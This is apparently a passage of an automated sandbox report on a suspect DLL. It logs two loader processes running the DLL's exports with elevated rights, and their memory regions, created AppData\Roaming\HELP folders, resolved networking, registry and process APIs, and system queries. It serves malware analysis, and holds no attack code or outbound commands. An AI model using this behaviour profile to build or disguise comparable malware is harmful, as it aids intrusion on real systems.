| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #55: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #55 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllUnregisterServer /fn_args="explorer.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:35, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:54 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd10 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D14
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0030ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0038ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x00477fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00580fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x0118ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x013effff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd4000 | 0x7ffd4000 | 0x7ffd4fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:28 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 98124 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #56: gorctexxzx.exe
125
0
| Information | Value |
|---|---|
| ID | #56 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=Entry /fn_args="explorer.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:35, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:54 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd20 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D24
0x
DC4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0015ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00160000 | 0x001c6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0030ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000310000 | 0x00310000 | 0x003d7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x0046ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x00570fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x0117ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0129ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000012a0000 | 0x012a0000 | 0x014affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001300000 | 0x01300000 | 0x013fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001470000 | 0x01470000 | 0x014affff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd7000 | 0x7ffd7000 | 0x7ffd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (108)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
15 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
9 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
6 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:28 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 98202 |
|
